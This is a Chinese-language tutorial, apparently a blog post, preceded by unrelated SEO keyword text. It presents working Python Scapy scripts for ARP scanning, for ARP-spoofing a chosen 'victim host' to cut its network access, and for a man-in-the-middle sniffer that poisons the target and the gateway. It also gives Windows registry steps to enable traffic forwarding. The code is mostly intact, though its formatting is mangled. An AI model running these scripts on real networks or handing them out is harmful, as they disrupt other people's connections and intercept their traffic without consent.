河北网站开发报价,如何做视频网站,云抢购网官方网站,百度关键词搜索怎么收费ARP中间人攻击#xff08;ARP spoofing#xff09;是一种利用本地网络的ARP协议漏洞进行欺骗的攻击方式#xff0c;攻击者会向目标主机发送虚假ARP响应包#xff0c;使得目标主机的ARP缓存中的IP地址和MAC地址映射关系被篡改#xff0c;从而使得目标主机将网络流量发送到攻…ARP中间人攻击ARP spoofing是一种利用本地网络的ARP协议漏洞进行欺骗的攻击方式攻击者会向目标主机发送虚假ARP响应包使得目标主机的ARP缓存中的IP地址和MAC地址映射关系被篡改从而使得目标主机将网络流量发送到攻击者指定的虚假MAC地址。攻击者可以在不被发现的情况下窃取目标主机的网络流量、信息等也可以进行其他的恶意行为如中间人攻击、监听等。
首先我们来实现一个简单的ARP扫描功能要实现ARP探测功能很容易如下代码中我们分别封装实现两个函数函数Parse_IP用于传入一个IP地址字符串自动生成该网段内的所有主机数函数ARP_Scan则用于发送ARP数据包在构造时直接使用ARP函数即可构造后通过sr1将其发送出去并等待返回结果。
from scapy.all import *
import argparse
import threading,time
import logging# 生成网段信息,例如输入: 192.168.1.1/20 生成1-20地址
def Parse_IP(targets):_split targets.split(/)first_ip _split[0]ip_split first_ip.split(.)ipv4 range(int(ip_split[3]),int(_split[1])1)addr [ ip_split[0].ip_split[1].ip_split[2].str(p) for p in ipv4 ]return addr# 通过ARP协议扫描局域网中在线的设备
def ARP_Scan(address):try:ret sr1(ARP(pdstaddress),timeout5,verboseFalse)if ret:if ret.haslayer(ARP) and ret.fields[op] 2:print([] IP地址: %-13s MAC地址: %-15s %(ret.fields[psrc],ret.fields[hwsrc]))except Exception:exit(1)if __name__ __main__:logging.getLogger(scapy.runtime).setLevel(logging.ERROR)parser argparse.ArgumentParser()parser.add_argument(-s,--scan,destscan,help输入一个扫描网段)args parser.parse_args()# 使用方式: main.py -s 192.168.1.1/100if args.scan:addr_list Parse_IP(args.scan)for item in addr_list:threads []t threading.Thread(targetARP_Scan,args(item,))threads.append(t)t.start()for item in threads:item.join()else:parser.print_help()上述代码通过指定-s并传入一个地址网段192.168.9.0/24则自动计算该网段主机数并依次对主机进行存活检测输出效果图如下所示 当我们能够得到内网中特定主机的IP地址以及MAC地址后则下一步就可以使用ARP断网攻击了该攻击原理是攻击者在目标网络中发送虚假的ARP响应包使得目标设备误认为网关的MAC地址已经更改为攻击者的MAC地址导致目标设备无法正常访问外部网络从而达到网络断网的目的。
读者在使用ARP断网之前还是需要通过ipconfig /all命令确定当前网卡的网卡名称如下图所示网卡描述则是我们需要的东西 接着来看一下如何实现ARP断网攻击的断网攻击的核心在于SendPayLoad函数该函数每次调用都将发送两个数据包第一个数据包用于伪造网关欺骗目标计算机我是网关第二个数据包用于伪造被欺骗计算机用于向网关表明身份有了这两个数据包并配合多线程发包则此时被攻击主机将会出现网络无法连接的情况。
from scapy.all import *
import argparse
import threading,time
import logging# 创建并发送有效载荷
def SendPayload(Interface,srcMac,tgtMac,gateWayMac,gatewayIP,tgtIP):print([] 目标MAC: {} 目标IP: {} 发送: 2 packets.format(tgtMac,tgtIP))# 生成ARP数据包,伪造网关欺骗目标计算机sendp(Ether(srcsrcMac,dsttgtMac)/ARP(hwsrcsrcMac,psrcgatewayIP,hwdsttgtMac,pdsttgtIP,op2),ifaceInterface)# 生成ARP数据包,伪造目标计算机欺骗网关sendp(Ether(srcsrcMac,dstgatewayMac)/ARP(hwsrcsrcMac,psrctgtIP,hwdstgatewayMac,pdstgatewayIP,op2),ifaceInterface)if __name__ __main__:parser argparse.ArgumentParser()parser.add_argument(-i,--interface,destinterface,help输入接口名)parser.add_argument(-g,--gateway,destgateway,help输入网关地址)parser.add_argument(-t,--target,desttarget,help输入被害主机地址)args parser.parse_args()# 使用方式: main.py -i Intel(R) Ethernet Connection (7) I219-LM -g 192.168.9.1 -t 192.168.9.10if args.gateway and args.target:srcMac get_if_hwaddr(args.interface) # 通过接口名称获取本机MAC地址tgtMac getmacbyip(args.target) # 通过IP地址获取目标计算机的MAC地址gatewayMac getmacbyip(args.gateway) # 指定本机网段的网关MAC地址while True:t threading.Thread(targetSendPayload,args(args.interface,srcMac,tgtMac,gatewayMac,args.gateway,args.target))t.start()t.join()time.sleep(1)else:parser.print_help()读者在调用时需要传入三个参数首先通过-i传入网卡名称接着通过-g指定当前网段内网关名称使用-t用于指定被害主机地址运行后如下图所示 有了ARP断网接着就来实现ARP嗅探功能针对断网攻击对于攻击者来说其实无法得到更多有用的数据我们还是希望能够监控目标主机的数据包并通过分析数据包得知一些特殊操作为了实现这个功能就需要改进断网程序让其具备嗅探的功能要实现嗅探而不是断网则需要进行两步配置首先需要开启注册表转发功能此处可以输入命令regedit打开注册表编辑器并在其中定位到
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters
选择下面的项目IPEnableRouter:REG_DWORD:0x0 找到项目鼠标右键修改数值为1至此即可开启主机的IP数据路由功能。 接着读者还需要打开系统服务菜单并找到Routing And RemoteAccess数据包转发服务此处如果没有打开请自行将其开启当开启后我们的主机将会具备路由转发功能这样即可实现模拟路由器的效果。 嗅探的原理很简单如下是一个完整的数据包嗅探工具其中createArp2Station函数用于生成伪造网关的数据包用于欺骗客户端createArp2Gateway函数则用于伪造目标主机数据包并欺骗网关当有了这两个函数再配合sniff抓包即可实现数据包的捕获如果读者需要自行分析数据包来往则可以自定义Packet_CallBack回调函数实现。
import sys,os,threading
import argparse
from scapy.all import *# 生成ARP数据包,伪造网关欺骗目标计算机
def createArp2Station(interface,target_ip,gateway_ip):dst_Macstr(getmacbyip(target_ip))self_Macstr(get_if_hwaddr(interface))Ether_dataEther(srcself_Mac,dstdst_Mac) / ARP(op2,hwsrcself_Mac,psrcgateway_ip,hwdstdst_Mac,pdsttarget_ip)try:sendp(Ether_data,inter2,ifaceinterface,loop1)except Exception as e:print(目标ARP数据发送失败!)# 生成ARP数据包,伪造目标计算机欺骗网关
def createArp2Gateway(interface,target_ip,gateway_ip):dst_Mac getmacbyip(gateway_ip)self_Mac get_if_hwaddr(interface)Ether_data NoneEther_data Ether(srcself_Mac, dstdst_Mac) / ARP(op2, hwsrcself_Mac, psrctarget_ip, hwdstdst_Mac, pdstgateway_ip)try:sendp(Ether_data, inter2,ifaceinterface,loop1)except Exception as e:print(网关ARP数据发送失败!)def Packet_CallBack(pkt):if pkt.haslayer(IP):if pkt.getlayer(IP).src ! 127.0.0.1:ip_src pkt.getlayer(IP).srcip_dst pkt.getlayer(IP).dstprint(源地址: {} --- 目标地址: {}.format(ip_src,ip_dst))if __name__ __main__:# 使用方式: main.py -i Intel(R) Ethernet Connection (7) I219-LM -g 192.168.9.1 -t 192.168.9.10parser argparse.ArgumentParser()parser.add_argument(-i,--interface,destinterface,help输入网卡名称)parser.add_argument(-t,--target_ip,desttarget_ip,help输入目标主机IP)parser.add_argument(-g,--gateway,destgateway,help输入网关地址)args parser.parse_args()if args.interface and args.target_ip and args.gateway:try:t1threading.Thread(targetcreateArp2Station,args(args.interface,args.target_ip,args.gateway))t1.setDaemon(True)t1.start()t2threading.Thread(targetcreateArp2Gateway,args(args.interface,args.target_ip,args.gateway))t2.setDaemon(True)t2.start()sniff(prnPacket_CallBack,filtertcp,ifaceargs.interface)except Exception:sys.exit(1)while True:passelse:parser.print_help()读者可自行运行上述程序并通过-i属性指定网卡名通过-g属性指定网关地址通过-t指定为被害主机地址运行后读者即可看到被害主机的数据包流向信息如下图所示 此时被害主机的所有数据包都会经过我们的主机读者可打开WireShark并启动抓包此时输入输入不同的过滤语句即可指定需要查看的数据包类型此时我们就是实现了对特定主机的监控当然这种监控数据包会掺杂我们自己的主机发出的读者可自行编写过滤规则实现过滤
